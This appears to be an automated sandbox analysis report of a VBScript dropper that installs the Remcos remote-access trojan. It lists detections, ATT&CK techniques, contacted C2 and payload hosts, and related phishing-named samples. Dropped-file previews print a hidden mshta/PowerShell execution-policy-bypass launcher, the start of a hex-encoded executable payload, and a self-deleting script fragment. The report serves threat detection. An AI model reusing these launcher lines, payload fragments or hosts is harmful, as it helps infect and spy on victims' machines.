Source: aspnet_compiler.exe, 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.4 Prov\|

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: cmd.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting221	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Windows Service1	Access Token Manipulation1	Scripting221	Input Capture111	Account Discovery1	Remote Desktop Protocol	Input Capture111	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Registry Run Keys / Startup Folder1	Windows Service1	Obfuscated Files or Information3	Credentials In Files2	System Service Discovery1	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Process Injection322	Masquerading1	NTDS	File and Directory Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell1	Network Logon Script	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion31	LSA Secrets	System Information Discovery33	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol12	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection322	DCSync	Security Software Discovery31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Virtualization/Sandbox Evasion31	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://ia601401.us.archive.orgx	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
194.5.97.183	0%	Virustotal		Browse
194.5.97.183	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
http://crl.micr	0%	URL Reputation	safe
https://ia801400.us.arX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ia801400.us.archive.org	207.241.228.140	true	false	high
ia601401.us.archive.org	207.241.227.121	true	false	high
ia601509.us.archive.org	207.241.227.119	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
194.5.97.183	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdig2s1-1597.crl0	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
https://ia801400.us.archive.org	powershell.exe, 00000001.00000002.603008008.000001E837A68000.00000004.00000001.sdmp	false		high
https://ia601401.us.archive.org	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	false		high
http://certificates.godaddy.com/repository/0	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000002.604945687.000001E83814F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT0y	powershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmp	false		high
http://certs.godaddy.com/repository/1301	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
https://ia601401.us.archive.orgx	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ia801400.us.archive.org	powershell.exe, 00000001.00000002.604580136.000001E838036000.00000004.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ia601401.us.archive.org	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
https://ia801400.us.archive.org/0/items/bat02/bat02.txt	powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmp	false		high
https://certs.godaddy.com/repository/0	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp	false		high
https://ia601509.us.archive.org	powershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot-g2.crl0F	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
https://ia601401.us.archive.org/6/items/server_20210420_1438/Server.txt	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot.crl0F	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
http://certificates.godaddy.com/repository/gdig2.crt0	powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp	false		high
http://crl.micr	powershell.exe, 0000000C.00000003.409245391.00000135614DD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.596741320.000001E836671000.00000004.00000001.sdmp	false		high
https://ia801400.us.arX	powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT	PowerShell_transcript.367706.fOfA42_i.20210421153634.txt.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.241.227.119	ia601509.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	false
194.5.97.183	unknown	Netherlands	208476	DANILENKODE	true
207.241.227.121	ia601401.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	false
207.241.228.140	ia801400.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	394453
Start date:	21.04.2021
Start time:	15:35:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 18s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Appraisa.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winVBS@8/11@3/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 99% (good quality ratio 94.1%) Quality average: 83.2% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 51.103.5.159, 168.61.161.212, 131.253.33.200, 13.107.22.200, 20.82.210.154, 40.88.32.150, 104.43.193.48, 92.122.145.220, 93.184.221.240, 13.88.21.125, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 184.30.24.56, 20.82.209.183 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, cs11.wpc.v0cdn.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:36:35	API Interceptor	82x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.97.183	Appraisal11002275444900.vbs	Get hash	malicious	Browse
207.241.227.121	SOA - NCL INTER LOGISTICS.ppt	Get hash	malicious	Browse
207.241.227.121	Payment Invoice##(6321210).vbs	Get hash	malicious	Browse
207.241.228.140	Appraisal11002275444900.vbs	Get hash	malicious	Browse
	invoice-order-21412-paypal.xlxs.vbs	Get hash	malicious	Browse
	Invoice-ID-(87656532).vbs	Get hash	malicious	Browse
	Statement-ID-(400603).vbs	Get hash	malicious	Browse
	order-invoice-amazon-#D01-9237793-8041853.DOCX.vbs	Get hash	malicious	Browse
	TK29.vbs	Get hash	malicious	Browse
	NR52.vbs	Get hash	malicious	Browse
	Purchase Order WT-7011 List.xls	Get hash	malicious	Browse
	New Purchase Order RFQ List - Copy.xls	Get hash	malicious	Browse
	Payment Advice PDF.ppt	Get hash	malicious	Browse
	New Orders PDF.pps	Get hash	malicious	Browse
	New Purchase Order.xls	Get hash	malicious	Browse
	Request for Quotation76584454.ppt	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ia801400.us.archive.org	Appraisal11002275444900.vbs	Get hash	malicious	Browse	207.241.228.140
	invoice-order-21412-paypal.xlxs.vbs	Get hash	malicious	Browse	207.241.228.140
	Invoice-ID-(87656532).vbs	Get hash	malicious	Browse	207.241.228.140
	Statement-ID-(400603).vbs	Get hash	malicious	Browse	207.241.228.140
	order-invoice-amazon-#D01-9237793-8041853.DOCX.vbs	Get hash	malicious	Browse	207.241.228.140
	TK29.vbs	Get hash	malicious	Browse	207.241.228.140
	NR52.vbs	Get hash	malicious	Browse	207.241.228.140
	Purchase Order WT-7011 List.xls	Get hash	malicious	Browse	207.241.228.140
	New Purchase Order RFQ List - Copy.xls	Get hash	malicious	Browse	207.241.228.140
	Payment Advice PDF.ppt	Get hash	malicious	Browse	207.241.228.140
	New Orders PDF.pps	Get hash	malicious	Browse	207.241.228.140
	New Purchase Order.xls	Get hash	malicious	Browse	207.241.228.140
	Request for Quotation76584454.ppt	Get hash	malicious	Browse	207.241.228.140
ia601401.us.archive.org	Details van vereiste.pps	Get hash	malicious	Browse	207.241.227.121
	Offerte aanvragen 22-02-2021.ppt	Get hash	malicious	Browse	207.241.227.121
	SOA - NCL INTER LOGISTICS.ppt	Get hash	malicious	Browse	207.241.227.121
	Payment Invoice##(6321210).vbs	Get hash	malicious	Browse	207.241.227.121

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	RemittanceAdvice_20210420_160446.jar	Get hash	malicious	Browse	194.5.97.160
	Urgent RFQ_AP65425652_032421,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	QUOTATION.exe	Get hash	malicious	Browse	194.5.97.181
	Appraisal11002275444900.vbs	Get hash	malicious	Browse	194.5.97.183
	SCANCOPY-794673947.exe	Get hash	malicious	Browse	194.5.97.11
	OC CVE6535 TVOP-MIO 16(C) 2021,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Tax Invoices.exe	Get hash	malicious	Browse	194.5.98.97
	SCAN_COPY-369326739.exe	Get hash	malicious	Browse	194.5.97.11
	Urgente RFQ_AP65425652_032421,pdf.exe	Get hash	malicious	Browse	194.5.97.14
	PAYMENT ADVICE.exe	Get hash	malicious	Browse	194.5.98.11
	GT42536.scr.exe	Get hash	malicious	Browse	194.5.98.251
	SCAN COPY2539976864PDF.exe	Get hash	malicious	Browse	194.5.97.11
	Kemmler-New order requirement 90901U,pdf.exe	Get hash	malicious	Browse	194.5.97.14
	SWIFTS.scr.exe	Get hash	malicious	Browse	194.5.98.184
	9pZezwiVaz.exe	Get hash	malicious	Browse	194.5.97.116
	AIC7VMxudf.exe	Get hash	malicious	Browse	194.5.98.250
	n4CeZTejKM.exe	Get hash	malicious	Browse	194.5.98.9
	New Order request Ref E100-#3175704534,pdf.e.exe	Get hash	malicious	Browse	194.5.97.14
	PO-#3175704534,PDF.exe	Get hash	malicious	Browse	194.5.97.14
	Evgp2DqQha.exe	Get hash	malicious	Browse	194.5.98.107
INTERNET-ARCHIVEUS	Appraisal11002275444900.vbs	Get hash	malicious	Browse	207.241.228.140
	invoice-order-21412-paypal.xlxs.vbs	Get hash	malicious	Browse	207.241.228.140
	PO -28001 X67533AB.ppt	Get hash	malicious	Browse	207.241.224.2
	0901e76c84536f06b_2500332020005403099_0901e76c4489e546f06b_250020214405500030995.WsF	Get hash	malicious	Browse	207.241.224.2
	RFQ P39948220.ppt	Get hash	malicious	Browse	207.241.224.2
	Order 100920-0087.pps	Get hash	malicious	Browse	207.241.224.2
	Confirm Order for AKTEK Company_E4117.ppt	Get hash	malicious	Browse	207.241.228.148
	Invoice-ID-(87656532).vbs	Get hash	malicious	Browse	207.241.228.140
	Statement-ID-(400603).vbs	Get hash	malicious	Browse	207.241.228.140
	order-invoice-amazon-#D01-9237793-8041853.DOCX.vbs	Get hash	malicious	Browse	207.241.228.140
	Invoice copyt2.pps	Get hash	malicious	Browse	207.241.228.153
	Invoice copy.ppt	Get hash	malicious	Browse	207.241.228.153
	Invoice copy.ppt	Get hash	malicious	Browse	207.241.228.153
	PO#070421APRIL-REV.ppt	Get hash	malicious	Browse	207.241.228.148
	NEW LEMA PO 652872-21.ppt	Get hash	malicious	Browse	207.241.228.153
	final po PP-11164.ppt	Get hash	malicious	Browse	207.241.228.148
	OrderSheet.pps	Get hash	malicious	Browse	207.241.224.2
	FK58.vbs	Get hash	malicious	Browse	207.241.228.150
	spectrum-statement-bill-7214213.DOCX.vbs	Get hash	malicious	Browse	207.241.224.2
	TK29.vbs	Get hash	malicious	Browse	207.241.228.140

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Bank Details.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	Payment_Swift_0096986854748574.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	#U7f51#U901f#U79d1#U6280CDN#U52a0#U901f#U4ea7#U54c1#U6587#U6863 .exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	Sales_Receipt_4423_052720.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	4600004505.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	6xrXVxpiSm.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	zj4NVQ6TKa.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	VZshmdIfmC.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	7wiTGdPpvv.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	7Wv8cQT117.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	SecuriteInfo.com.Variant.Bulz.440290.18036.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	SecuriteInfo.com.Trojan.GenericKD.36741716.4036.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	SecuriteInfo.com.Trojan.GenericKD.36740349.3453.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	Account Details.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	RFQOIL FIELD MARINE OFFSHORE SERVICESFSF62BOPCOSO12A & SO15E.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	Appraisal11002275444900.vbs	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	Pay-u Remittance.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	QTY090900.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	NEW SUPPLIER FORM.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140
	STATEMENT NO -- NAS-2021-1489.exe	Get hash	malicious	Browse	207.241.227.119 207.241.227.121 207.241.228.140

Dropped Files

No context

Created / dropped Files

C:\Users\Public\ Microsoft.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	1122932
Entropy (8bit):	3.6195801123734963
Encrypted:	false
SSDEEP:	12288:vGXlNr0zk3y3Dv5cuHIrW+15oUy5/1lSXr64jdLPdeCw9Zgd1uSIg4McdU/EjFhK:HWIF/1y
MD5:	EDA0264CC0BAA7804CE2A32A99AA9B98
SHA1:	274B4D04E802370CAC624649EA30149DDED4E053
SHA-256:	950CC79C3173D2A1AD76A7B8E64C9100CA929CAF0201396758380FF2D712680F
SHA-512:	43F6DD07E297C157F54147AA34512B4812F2650F990865C81181E14D379BF12352FCC3C2D20FBFB535D8BF2A3B5EBC7AB6AA0CD47AB498F0D1F5818E41BF9A74
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: C:\Users\Public\ Microsoft.ps1, Author: Joe Security
Reputation:	low
Preview:	[String]$H1='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000006F78E42D2B198A7E2B198A7E2B198A7E9F857B7E39198A7E9F85797EB4198A7E9F85787E35198A7E783A937E29198A7E663A977E2A198A7EB5B94D7E2A198A7E1047897F31198A7E10478F7F11198A7E10478E7F09198A7E2261197E38198A7E2B198B7E37188A7EBC47837F76198A7EB947757E2A198A7EBC47887F2A198A7E526963682B198A7E0000000000000000504500004C01070039956C600000000000000000E00002010B010E0000100500000A020000000000EFEE020000100000002005000000400000100000000200000500010000000000050001000000000000800700000400000000000002004080000010000010000000001000001000000000000010000000000000000000000038770600DC00000000F00600D04A0000000000000000000000000000000000000040070024380000F05B06003800000000000000000000000000000000000000845C060018000000285C0600400000000000000000000000002005006C0

C:\Users\Public\Run\Run.bat Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.980054100952451
Encrypted:	false
SSDEEP:	3:rNk27jGQRAkFVAIUeHHgzGSJJFItGQqPJH0cVER5ZAuaHF5Fg+t4hUv:Zk23GEPNvHAB80QO0cyZAuaHZg+CUv
MD5:	F7E3CFAB366105191CED85C7D8563F67
SHA1:	51F8DD8C163E7AC0770FFE6DC7FCECADA1F0A5F5
SHA-256:	1EFA2367114F60EFA5C9714716072B432F114953A87C533C45EDE565EB5DA079
SHA-512:	688A01BB21C4FA9452D50D1299709387CFED843CBA58129244E9D1D704E18EBD1DCA7693FA8160622729F0BD48C42DA0896BC8470C9B9E6D12F399A65846D077
Malicious:	false
Reputation:	low
Preview:	mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\ Microsoft.ps1'"", 0:close")

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11883
Entropy (8bit):	4.890750684634174
Encrypted:	false
SSDEEP:	192:4Vsm5emlQib4NxoeR93YrKkX9smlp5b4Q2Ca6pZlbjvwRjdHPRhjiMDOmEN3H+O8:4kib4WF43opbjvwRjdvRZiQ0HzAFaib9
MD5:	6049E98CE5D644576C54D3F4844468ED
SHA1:	58E3D61381D54FD51C0C913940FF9B952189A5D8
SHA-256:	354ADD5966932A0ED1ABE70FE8A1850B215564290661E34E1FBCEB7989AA5803
SHA-512:	44878B4BD939DFDB1B34EAEB94280E723FDC3068A1FFC56FA902906669DBDD88F8FEEECC2BE79E838A0841EFBCEE909765F9DE0BAFF01598436C8AC1F6956EAC
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE......<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mhniqwj.vsf.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqknuhzr.nmt.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
